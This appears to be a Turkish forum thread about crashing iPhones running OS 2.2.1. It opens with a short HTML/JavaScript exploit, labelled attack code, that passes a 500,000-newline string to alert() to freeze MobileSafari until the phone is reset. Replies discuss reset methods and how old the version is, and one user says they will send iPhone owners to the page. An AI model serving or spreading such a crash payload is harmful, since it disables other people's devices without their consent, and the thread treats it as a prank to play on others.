İphone Kilitleme
-
Apple iPhone’un 2.2.1 sürümünde Mobile tarayıcı olan MobilSafari ‘ de var olan Güvenlik açığı sayesinde iPhone’lar kilitlenebiliyor. Güvenlik açığı aşağıdaki Exploit’in var olduğu internet sitesine iPhone ile bağlanıp 4-5 dk kadar dolaştığınızda aktif hale geliyor. iPHone kilitleniyor ve Reset atmanız sürece açılmıyor.
# Exploit – (Saldırı Kodu)
<html>
<body>
<script>
var a = ”;
for (var i = 1; i <= 500000; i++)
{
a += ‘\n’;
}
alert(a);
</script>
</body>
</html> -
iphone akdar saçma bir telefon yok hoca saolasın.Bütün iphonluları bu sayfaya yönlendircem
-
hoca bari nasıl reset atılacağınıda yazsaydın
he nasıl atılır ?
her elektronik cihazda olduğu gibi bulduğunuz tüm tuşlara basın ;)
çamaşır , bulaşık makinaları ve iphonelarda çalışıyor tarafımca denendi :)
-
sleep tuşuna ve ortadaki alt taki menü tuşuna aynadna basılı tut 30-40 sn
restart oluyor
-
reset atmak kapatip acma olayi degildir.
restore etmeden o sekilde acilmaz o telefon eger boyle birsey varsa. ama mantigini anlamadm. denemek lazm
gerci 2.2.1 kalmadi herkez artik 3.0 da
-
Artik 2.0 ve 3.0 devri kapandi hacilar.. Bu aciklara karsi Apple uyuyormu sizce ? 3.0.1e gecmeniz tavsiye olunur. Edüt: Reset atma islemini Itunes icerisinden tek Tus tiklamasi ile yapmaniz mümkün,tabi eger gerek olursa..
-
benim başıma geldi oyuzden yazdım :D
ne oldugunu tam oalrak söliyeyim, arkadaşa verdim aleti bi kaç siteye girdi dedi abi alet dondu aldım elime baktım wake off yaptıma çtım şifre ekranı çıktı şifreyi girmek iin basıyorum tuşlar çalısmıyo dondu, wake off yaptım tekrar on yaparken ekran bembeyaz oldu ve bidahada açılmadı
iki tuşada aynanda 30 sn bastım düzeldi
-
2.2.1 kaldımı ya adamlar üstüne kaç versiyon güncellediler,arkadaşları bu sayfaya yönlendirmeye gerek yok arkadaşım üstünden çok sular aktı bu sürümün :)
-
restore ve restart farklı. home ve power tuşuna 40 saniye falan bastığında restart atıyor telefon kendine. kilitlendiğinde bu yöntemi yiyor. bazı telefonların home ve power tuşuna 15 dakika basanları biliyorum.
-
shadowan bunu yazdı:
-----------------------------
2.2.1 kaldımı ya adamlar üstüne kaç versiyon güncellediler,arkadaşları bu sayfaya yönlendirmeye gerek yok arkadaşım üstünden çok sular aktı bu sürümün :)
-----------------------------bendeki 2.2.1
3.0 geçmek için 18 lira para istiyo hayatta vermem
-
ayfon almayın patlar sonra.